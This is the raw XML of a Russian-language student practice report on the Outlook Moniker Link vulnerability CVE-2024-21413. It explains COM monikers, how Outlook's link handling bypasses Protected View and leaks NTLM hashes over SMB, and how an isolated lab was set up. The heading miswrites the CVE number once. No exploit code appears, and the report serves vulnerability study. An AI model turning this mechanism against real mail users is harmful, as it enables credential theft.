      <w:r w:rsidR="0055128B" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0055128B" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:webHidden/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E18E40" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="00000000" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:anchor="_Toc506483745" w:history="1">
        <w:r w:rsidR="0055128B">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Выводы</w:t>
        </w:r>
        <w:r w:rsidR="0055128B">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="0055128B">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="0055128B">
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:webHidden/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="731AD5DC" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Список использованных источников</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId12" w:anchor="_Toc506483746" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:webHidden/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="678B43FE" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Приложение А</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="_Toc506483745" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af0"/>
            <w:color w:val="auto"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BC56D7" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="714"/>
        <w:rPr>
          <w:rStyle w:val="af0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285C61B4" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:pageBreakBefore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Цели и задачи практики</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F37FFE" w14:textId="02DEA193" w:rsidR="005B388F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практики — </w:t>
      </w:r>
      <w:r w:rsidR="005B388F" w:rsidRPr="005B388F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исследование уязвимости CVE-2024-21413 (Moniker Link</w:t>
      </w:r>
      <w:r w:rsidR="007376E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5B388F" w:rsidRPr="005B388F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) в Microsoft Outlook, анализ принципов ее работы, причин возникновения и изменений, внесенных разработчиком для устранения уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241303F9" w14:textId="7181930E" w:rsidR="0055128B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62FBA08F" w14:textId="06FAE0F7" w:rsidR="005B388F" w:rsidRPr="005B388F" w:rsidRDefault="005B388F" w:rsidP="005B388F">
      <w:pPr>
        <w:pStyle w:val="af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88F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучить особенности работы технологий COM и Moniker, используемых в операционной системе Windows и приложении Microsoft Outlook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B6B62" w14:textId="1532A48C" w:rsidR="005B388F" w:rsidRPr="005B388F" w:rsidRDefault="005B388F" w:rsidP="005B388F">
      <w:pPr>
        <w:pStyle w:val="af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88F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исследовать механизм возникновения уязвимости CVE-2024-21413 и условия, необходимые для ее эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A637BD8" w14:textId="3639D94F" w:rsidR="005B388F" w:rsidRPr="005B388F" w:rsidRDefault="005B388F" w:rsidP="005B388F">
      <w:pPr>
        <w:pStyle w:val="af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88F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подготовить лабораторную среду для безопасного воспроизведения уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593073B" w14:textId="6B55E9B0" w:rsidR="005B388F" w:rsidRPr="005B388F" w:rsidRDefault="005B388F" w:rsidP="005B388F">
      <w:pPr>
        <w:pStyle w:val="af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88F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выполнить воспроизведение сценария эксплуатации CVE-2024-21413 в контролируемых условиях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74891C46" w14:textId="10D92341" w:rsidR="005B388F" w:rsidRPr="005B388F" w:rsidRDefault="005B388F" w:rsidP="005B388F">
      <w:pPr>
        <w:pStyle w:val="af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88F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проанализировать процесс эксплуатации и полученные результаты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753FBE4" w14:textId="67C6D7EB" w:rsidR="0055128B" w:rsidRDefault="005B388F" w:rsidP="005B388F">
      <w:pPr>
        <w:pStyle w:val="af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88F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучить изменения, внесенные разработчиком для устранения уязвимости, и оценить их влияние на безопасность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D13025F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6197AA1" w14:textId="77777777" w:rsidR="001E4BD6" w:rsidRDefault="001E4BD6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2F66CDA" w14:textId="77777777" w:rsidR="001E4BD6" w:rsidRDefault="001E4BD6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02F25CF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FC00F83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5AB3A03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992D907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F10925B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5135CE7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F8DD98B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8549EBD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BE0DC98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932FD63" w14:textId="77777777" w:rsid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6BD06AF" w14:textId="77777777" w:rsidR="005B388F" w:rsidRPr="005B388F" w:rsidRDefault="005B388F" w:rsidP="005B388F">
      <w:pPr>
        <w:pStyle w:val="af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BF346C6" w14:textId="77777777" w:rsidR="0055128B" w:rsidRDefault="0055128B" w:rsidP="0055128B">
      <w:pPr>
        <w:pStyle w:val="af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Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEEF7F6" w14:textId="2FB8277F" w:rsidR="0055128B" w:rsidRPr="001E4BD6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2.1.</w:t>
      </w:r>
      <w:r w:rsidR="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Изучение уязвимости </w:t>
      </w:r>
      <w:r w:rsidR="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-2014-21413</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8F2ACB" w14:textId="03C3C087" w:rsidR="00C6335C" w:rsidRDefault="007376E2" w:rsidP="00C6335C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6E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2024-21413 Moniker Links</w:t>
      </w:r>
      <w:r w:rsidR="002B2B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007376E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">— это критическая уязвимость (с оценкой 9.8 по шкале CVSS) удаленного выполнения кода (RCE) и кражи учетных данных, обнаруженная в почтовом клиенте Microsoft Outlook. </w:t>
      </w:r>
      <w:r w:rsidR="001E4BD6" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>COM (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E4BD6" w:rsidRPr="001E4BD6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="001E4BD6" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object Model) — программная компонентная модель Microsoft, определяющая стандарт взаимодействия между объектами различных приложений</w:t>
      </w:r>
      <w:r w:rsidR="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E4BD6" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(объектами, такими как: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E4BD6" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Word.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E4BD6" w:rsidRPr="001E4B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E4BD6" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Excel.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E4BD6" w:rsidRPr="001E4B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E4BD6" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Outlook.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E4BD6" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="007376E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Она определяет набор правил, по которым приложения и службы предоставляют свои объекты другим программам, независимо от языка программирования, на котором они написаны.</w:t>
      </w:r>
      <w:r w:rsidR="00C6335C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C6335C" w:rsidRPr="00C6335C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Интерфейс COM-объекта — это строго определенный набор функций (методов), через который другие программы могут взаимодействовать с этим объектом.</w:t>
      </w:r>
      <w:r w:rsidR="00C633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16B58C" w14:textId="1A3B288B" w:rsidR="007376E2" w:rsidRDefault="00C6335C" w:rsidP="00C6335C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C63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C61FE" wp14:editId="6F77FD13">
            <wp:extent cx="4000500" cy="31337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013D" w14:textId="56B992A7" w:rsidR="00C6335C" w:rsidRDefault="00C6335C" w:rsidP="00C6335C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Схема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-интерфейса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IUnknown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6335C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6621BCEE" w14:textId="77777777" w:rsidR="002B2B07" w:rsidRPr="002B2B07" w:rsidRDefault="00C6335C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35C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Moniker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35C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>("кличка" или "прозвище") — специальный COM-объект</w:t>
      </w:r>
      <w:r w:rsidR="002B2B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002B2B07" w:rsidRPr="002B2B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B2B07" w:rsidRPr="002B2B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>содержащий строковое представление другого объекта и механизм его разрешения в экземпляр COM-объекта.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6335C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Главная задача Moniker — перейти из текстовой строки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35C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(пути к файлу или системой команды) в готовый к работе указатель на объект.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35C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Работа с Moniker-объектом осуществляется при помощи интерфейса IMoniker. Всего в IMoniker (включая унаследованные методы) входит более 20 методов.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обработка ссылок в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
      <w:r w:rsidR="00C052C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r w:rsidR="00C052C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C052C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> протоколом</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05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происходит</w:t>
      </w:r>
      <w:r w:rsidR="00C052C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в уязвимости</w:t>
      </w:r>
      <w:r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14:paraId="5532EF9E" w14:textId="04AB6351" w:rsidR="00C6335C" w:rsidRPr="002B2B07" w:rsidRDefault="002B2B07" w:rsidP="002B2B07">
      <w:pPr>
        <w:pStyle w:val="af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A799D22" wp14:editId="4D0DD6EE">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="29" name="Прямоугольни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9600C" id="Прямоугольник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2B07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63A6185A" wp14:editId="37F92BB3">
            <wp:extent cx="5630328" cy="7025640"/>
            <wp:effectExtent l="0" t="0" r="889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560" cy="703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8C5F" w14:textId="00E49A44" w:rsidR="00C052C3" w:rsidRDefault="00C052C3" w:rsidP="00C052C3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Схема обработки ссылок</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05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Outlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00C052C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D03B5E" w14:textId="37D0E1A8" w:rsidR="00C052C3" w:rsidRDefault="002B2B07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B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ошибка логики Outlook заключалась в том, что после предварительной обработки гиперссылки с использованием протокола file:// приложение </w:t>
      </w:r>
      <w:r w:rsidRPr="002B2B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">передавало ее стандартному механизму обработки гиперссылок Windows. В процессе обработки библиотека hlink.dll вызывала функцию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B2B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MkParseDisplayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B2B07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, которая интерпретировала строку как COM Moniker. В результате строка, воспринимаемая Outlook как обычная гиперссылка, обрабатывалась системой как инструкция по созданию составного Moniker. </w:t>
      </w:r>
      <w:r w:rsidR="00C052C3" w:rsidRPr="00C052C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В итоге</w:t>
      </w:r>
      <w:r w:rsidR="008C6E53" w:rsidRPr="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outlook воспринимал передаваемое значение как обычную строку гиперссылки, тогда как механизм COM интерпретировал ее как описание объекта Moniker, подлежащего разрешению. </w:t>
      </w:r>
      <w:r w:rsidR="00C052C3" w:rsidRPr="00C052C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поскольку управление перехватывал системный механизм Moniker, стандартная песочница Office (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C052C3" w:rsidRPr="00C052C3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="00C052C3" w:rsidRPr="00C052C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> View) просто не активировалась. Далее система спокойно подключалась по SMB к серверу, чтобы собрать Moniker, попутно отдавая NTLM хэш.</w:t>
      </w:r>
      <w:r w:rsidR="00C052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66BCC3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F4CCE2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E4B016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BDFEC2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2E1D5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DDD68F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942A45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1C0BB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0D8EA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A1245A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F24E6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EF651B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80BEFA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34511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2DA3F1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A9EDD5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379053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9122DC" w14:textId="77777777" w:rsidR="00EE3A0F" w:rsidRDefault="00EE3A0F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B2B9BE" w14:textId="3F8AF5BE" w:rsidR="008C6E53" w:rsidRDefault="008C6E53" w:rsidP="008C6E53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2.2. Подготовка лабораторного стенда</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270272BE" w14:textId="4C6336EC" w:rsidR="008C6E53" w:rsidRPr="008C6E53" w:rsidRDefault="008C6E53" w:rsidP="008C6E53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6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для безопасного исследования уязвимости CVE-2024-21413 была подготовлена изолированная лабораторная среда на базе виртуальных машин. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14590B2A" w14:textId="153EE2B0" w:rsidR="008C6E53" w:rsidRPr="008C6E53" w:rsidRDefault="008C6E53" w:rsidP="008C6E53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6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В состав лабораторной среды вошли:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E054D" w14:textId="6AE7E29E" w:rsidR="008C6E53" w:rsidRPr="008C6E53" w:rsidRDefault="008C6E53" w:rsidP="008C6E53">
      <w:pPr>
        <w:pStyle w:val="af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8C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>иртуальная машина с уязвимой версией операционной системы Windows и установленным Microsoft Outlook;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE39E8" w14:textId="62DDF08C" w:rsidR="008C6E53" w:rsidRPr="008C6E53" w:rsidRDefault="008C6E53" w:rsidP="008C6E53">
      <w:pPr>
        <w:pStyle w:val="af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6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>виртуальная машина, выполняющая роль удаленного SMB-сервера, необходимого для моделирования сетевого взаимодействия при обработке Moniker-ссылок;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61305870" w14:textId="2366D948" w:rsidR="008C6E53" w:rsidRDefault="008C6E53" w:rsidP="008C6E53">
      <w:pPr>
        <w:pStyle w:val="af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6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">средства анализа и отладки, включая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, использовавшийся для исследования процесса обработки гиперссылок и анализа стека вызовов.</w:t>
      </w:r>
    </w:p>
